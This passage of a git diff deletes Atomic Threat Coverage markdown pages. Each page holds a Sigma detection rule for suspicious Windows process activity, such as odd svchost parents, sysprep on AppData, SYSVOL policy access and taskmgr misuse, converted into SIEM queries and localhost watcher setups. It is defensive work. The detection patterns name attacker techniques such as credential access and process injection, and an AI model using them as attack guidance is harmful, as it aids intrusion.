-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*\\svchost.exe" -and  -not (($_.message -match "ParentImage.*.*\\services.exe" -or $_.message -match "ParentImage.*.*\\MsMpEng.exe" -or $_.message -match "ParentImage.*.*\\Mrt.exe" -or $_.message -match "ParentImage.*.*\\rpcnet.exe" -or $_.message -match "ParentImage.*.*\\svchost.exe"))) -and  -not (-not ParentImage="*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Image.keyword:*\\svchost.exe AND (NOT (winlog.event_data.ParentImage.keyword:(*\\services.exe OR *\\MsMpEng.exe OR *\\Mrt.exe OR *\\rpcnet.exe OR *\\svchost.exe)))) AND (NOT (NOT _exists_:winlog.event_data.ParentImage)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/01d2e2a1-5f09-44f7-9fc1-24faa7479b6d <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Svchost Process",
-    "description": "Detects a suspicious svchost process start",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1036"
-    ],
-    "query": "((winlog.event_data.Image.keyword:*\\\\svchost.exe AND (NOT (winlog.event_data.ParentImage.keyword:(*\\\\services.exe OR *\\\\MsMpEng.exe OR *\\\\Mrt.exe OR *\\\\rpcnet.exe OR *\\\\svchost.exe)))) AND (NOT (NOT _exists_:winlog.event_data.ParentImage)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Image.keyword:*\\\\svchost.exe AND (NOT (winlog.event_data.ParentImage.keyword:(*\\\\services.exe OR *\\\\MsMpEng.exe OR *\\\\Mrt.exe OR *\\\\rpcnet.exe OR *\\\\svchost.exe)))) AND (NOT (NOT _exists_:winlog.event_data.ParentImage)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Svchost Process'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Image.keyword:*\\svchost.exe AND (NOT (ParentImage.keyword:(*\\services.exe *\\MsMpEng.exe *\\Mrt.exe *\\rpcnet.exe *\\svchost.exe)))) AND (NOT (NOT _exists_:ParentImage)))
-```
-
-
-### splunk
-    
-```
-((Image="*\\svchost.exe" NOT ((ParentImage="*\\services.exe" OR ParentImage="*\\MsMpEng.exe" OR ParentImage="*\\Mrt.exe" OR ParentImage="*\\rpcnet.exe" OR ParentImage="*\\svchost.exe"))) NOT (NOT ParentImage="*")) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (Image="*\\svchost.exe"  -(ParentImage IN ["*\\services.exe", "*\\MsMpEng.exe", "*\\Mrt.exe", "*\\rpcnet.exe", "*\\svchost.exe"]))  -(-ParentImage=*))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*.*\svchost\.exe)(?=.*(?!.*(?:.*(?=.*(?:.*.*\services\.exe|.*.*\MsMpEng\.exe|.*.*\Mrt\.exe|.*.*\rpcnet\.exe|.*.*\svchost\.exe)))))))(?=.*(?!.*(?:.*(?=.*(?!ParentImage))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_svchost_no_cli.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_svchost_no_cli.md
deleted file mode 100644
index 3949cfa..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_svchost_no_cli.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | Suspect Svchost Activity       |
-|:-------------------------|:------------------|
-| **Description**          | It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space. |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** | <ul><li>[T1055: Process Injection](https://attack.mitre.org/techniques/T1055)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1055: Process Injection](../Triggers/T1055.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2](https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2)</li></ul>  |
-| **Author**               | David Burkett |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspect Svchost Activity
-id: 16c37b52-b141-42a5-a3ea-bbe098444397
-status: experimental
-description: It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.
-references:
-    - https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2
-author: David Burkett
-date: 2019/12/28
-tags:
-    - attack.t1055
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        CommandLine: null
-    selection2:
-        Image: '*\svchost.exe'
-    filter:
-        ParentImage:
-            - '*\rpcnet.exe'
-            - '*\rpcnetp.exe'
-    condition: (selection1 and selection2) and not filter
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.ID -eq "1" -and -not CommandLine="*" -and $_.message -match "Image.*.*\\svchost.exe") -and  -not (($_.message -match "ParentImage.*.*\\rpcnet.exe" -or $_.message -match "ParentImage.*.*\\rpcnetp.exe"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((NOT _exists_:winlog.event_data.CommandLine AND winlog.event_data.Image.keyword:*\\svchost.exe) AND (NOT (winlog.event_data.ParentImage.keyword:(*\\rpcnet.exe OR *\\rpcnetp.exe))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/16c37b52-b141-42a5-a3ea-bbe098444397 <<EOF
-{
-  "metadata": {
-    "title": "Suspect Svchost Activity",
-    "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.",
-    "tags": [
-      "attack.t1055"
-    ],
-    "query": "((NOT _exists_:winlog.event_data.CommandLine AND winlog.event_data.Image.keyword:*\\\\svchost.exe) AND (NOT (winlog.event_data.ParentImage.keyword:(*\\\\rpcnet.exe OR *\\\\rpcnetp.exe))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((NOT _exists_:winlog.event_data.CommandLine AND winlog.event_data.Image.keyword:*\\\\svchost.exe) AND (NOT (winlog.event_data.ParentImage.keyword:(*\\\\rpcnet.exe OR *\\\\rpcnetp.exe))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspect Svchost Activity'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((NOT _exists_:CommandLine AND Image.keyword:*\\svchost.exe) AND (NOT (ParentImage.keyword:(*\\rpcnet.exe *\\rpcnetp.exe))))
-```
-
-
-### splunk
-    
-```
-((NOT CommandLine="*" Image="*\\svchost.exe") NOT ((ParentImage="*\\rpcnet.exe" OR ParentImage="*\\rpcnetp.exe"))) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (event_id="1" -CommandLine=* Image="*\\svchost.exe")  -(ParentImage IN ["*\\rpcnet.exe", "*\\rpcnetp.exe"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*(?!CommandLine))(?=.*.*\svchost\.exe)))(?=.*(?!.*(?:.*(?=.*(?:.*.*\rpcnet\.exe|.*.*\rpcnetp\.exe))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_sysprep_appdata.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_sysprep_appdata.md
deleted file mode 100644
index 68b97c7..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_sysprep_appdata.md
+++ /dev/null
@@ -1,174 +0,0 @@
-| Title                    | Sysprep on AppData Folder       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec) |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>False positives depend on scripts and administrative tools used in the monitored environment</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets](https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets)</li><li>[https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b](https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Sysprep on AppData Folder
-id: d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e
-status: experimental
-description: Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)
-references:
-    - https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets
-    - https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b
-tags:
-    - attack.execution
-author: Florian Roth
-date: 2018/06/22
-modified: 2018/12/11
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            - '*\sysprep.exe *\AppData\\*'
-            - sysprep.exe *\AppData\\*
-    condition: selection
-falsepositives:
-    - False positives depend on scripts and administrative tools used in the monitored environment
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.*\\sysprep.exe .*\\AppData\\.*" -or $_.message -match "CommandLine.*sysprep.exe .*\\AppData\\.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*\\sysprep.exe\ *\\AppData\\* OR sysprep.exe\ *\\AppData\\*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e <<EOF
-{
-  "metadata": {
-    "title": "Sysprep on AppData Folder",
-    "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)",
-    "tags": [
-      "attack.execution"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(*\\\\sysprep.exe\\ *\\\\AppData\\\\* OR sysprep.exe\\ *\\\\AppData\\\\*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*\\\\sysprep.exe\\ *\\\\AppData\\\\* OR sysprep.exe\\ *\\\\AppData\\\\*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Sysprep on AppData Folder'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(*\\sysprep.exe *\\AppData\\* sysprep.exe *\\AppData\\*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="*\\sysprep.exe *\\AppData\\*" OR CommandLine="sysprep.exe *\\AppData\\*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["*\\sysprep.exe *\\AppData\\*", "sysprep.exe *\\AppData\\*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*\sysprep\.exe .*\AppData\\.*|.*sysprep\.exe .*\AppData\\.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_sysvol_access.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_sysvol_access.md
deleted file mode 100644
index d61bf7d..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_sysvol_access.md
+++ /dev/null
@@ -1,174 +0,0 @@
-| Title                    | Suspicious SYSVOL Domain Group Policy Access       |
-|:-------------------------|:------------------|
-| **Description**          | Detects Access to Domain Group Policies stored in SYSVOL |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>administrative activity</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://adsecurity.org/?p=2288](https://adsecurity.org/?p=2288)</li><li>[https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100](https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100)</li></ul>  |
-| **Author**               | Markus Neis |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious SYSVOL Domain Group Policy Access
-id: 05f3c945-dcc8-4393-9f3d-af65077a8f86
-status: experimental
-description: Detects Access to Domain Group Policies stored in SYSVOL
-references:
-    - https://adsecurity.org/?p=2288
-    - https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100
-author: Markus Neis
-date: 2018/04/09
-modified: 2018/12/11
-tags:
-    - attack.credential_access
-    - attack.t1003
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine: '*\SYSVOL\\*\policies\\*'
-    condition: selection
-falsepositives:
-    - administrative activity
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "CommandLine.*.*\\SYSVOL\\.*\\policies\\.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:*\\SYSVOL\\*\\policies\\*
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/05f3c945-dcc8-4393-9f3d-af65077a8f86 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious SYSVOL Domain Group Policy Access",
-    "description": "Detects Access to Domain Group Policies stored in SYSVOL",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:*\\\\SYSVOL\\\\*\\\\policies\\\\*"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:*\\\\SYSVOL\\\\*\\\\policies\\\\*",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious SYSVOL Domain Group Policy Access'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:*\\SYSVOL\\*\\policies\\*
-```
-
-
-### splunk
-    
-```
-CommandLine="*\\SYSVOL\\*\\policies\\*"
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine="*\\SYSVOL\\*\\policies\\*")
-```
-
-
-### grep
-    
-```
-grep -P '^.*\SYSVOL\\.*\policies\\.*'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_taskmgr_localsystem.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_taskmgr_localsystem.md
deleted file mode 100644
index 811a8a9..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_taskmgr_localsystem.md
+++ /dev/null
@@ -1,171 +0,0 @@
-| Title                    | Taskmgr as LOCAL_SYSTEM       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1036: Masquerading](https://attack.mitre.org/techniques/T1036)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unkown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Taskmgr as LOCAL_SYSTEM
-id: 9fff585c-c33e-4a86-b3cd-39312079a65f
-status: experimental
-description: Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM
-tags:
-    - attack.defense_evasion
-    - attack.t1036
-author: Florian Roth
-date: 2018/03/18
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        User: NT AUTHORITY\SYSTEM
-        Image: '*\taskmgr.exe'
-    condition: selection
-falsepositives:
-    - Unkown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "User.*NT AUTHORITY\\SYSTEM" -and $_.message -match "Image.*.*\\taskmgr.exe") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.User:"NT\ AUTHORITY\\SYSTEM" AND winlog.event_data.Image.keyword:*\\taskmgr.exe)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/9fff585c-c33e-4a86-b3cd-39312079a65f <<EOF
-{
-  "metadata": {
-    "title": "Taskmgr as LOCAL_SYSTEM",
-    "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1036"
-    ],
-    "query": "(winlog.event_data.User:\"NT\\ AUTHORITY\\\\SYSTEM\" AND winlog.event_data.Image.keyword:*\\\\taskmgr.exe)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.User:\"NT\\ AUTHORITY\\\\SYSTEM\" AND winlog.event_data.Image.keyword:*\\\\taskmgr.exe)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Taskmgr as LOCAL_SYSTEM'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(User:"NT AUTHORITY\\SYSTEM" AND Image.keyword:*\\taskmgr.exe)
-```
-
-
-### splunk
-    
-```
-(User="NT AUTHORITY\\SYSTEM" Image="*\\taskmgr.exe")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" User="NT AUTHORITY\\SYSTEM" Image="*\\taskmgr.exe")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*NT AUTHORITY\SYSTEM)(?=.*.*\taskmgr\.exe))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_taskmgr_parent.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_taskmgr_parent.md
deleted file mode 100644
index 0ff4ea8..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_taskmgr_parent.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | Taskmgr as Parent       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the creation of a process from Windows task manager |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1036: Masquerading](https://attack.mitre.org/techniques/T1036)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>Administrative activity</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Taskmgr as Parent
-id: 3d7679bd-0c00-440c-97b0-3f204273e6c7
-status: experimental
-description: Detects the creation of a process from Windows task manager
-tags:
-    - attack.defense_evasion
-    - attack.t1036
-author: Florian Roth
-date: 2018/03/13
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentImage: '*\taskmgr.exe'
-    filter:
-        Image:
-            - '*\resmon.exe'
-            - '*\mmc.exe'
-            - '*\taskmgr.exe'
-    condition: selection and not filter
-fields:
-    - Image
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Administrative activity
-level: low
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "ParentImage.*.*\\taskmgr.exe" -and  -not (($_.message -match "Image.*.*\\resmon.exe" -or $_.message -match "Image.*.*\\mmc.exe" -or $_.message -match "Image.*.*\\taskmgr.exe"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.ParentImage.keyword:*\\taskmgr.exe AND (NOT (winlog.event_data.Image.keyword:(*\\resmon.exe OR *\\mmc.exe OR *\\taskmgr.exe))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/3d7679bd-0c00-440c-97b0-3f204273e6c7 <<EOF
-{
-  "metadata": {
-    "title": "Taskmgr as Parent",
-    "description": "Detects the creation of a process from Windows task manager",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1036"
-    ],
-    "query": "(winlog.event_data.ParentImage.keyword:*\\\\taskmgr.exe AND (NOT (winlog.event_data.Image.keyword:(*\\\\resmon.exe OR *\\\\mmc.exe OR *\\\\taskmgr.exe))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.ParentImage.keyword:*\\\\taskmgr.exe AND (NOT (winlog.event_data.Image.keyword:(*\\\\resmon.exe OR *\\\\mmc.exe OR *\\\\taskmgr.exe))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Taskmgr as Parent'",
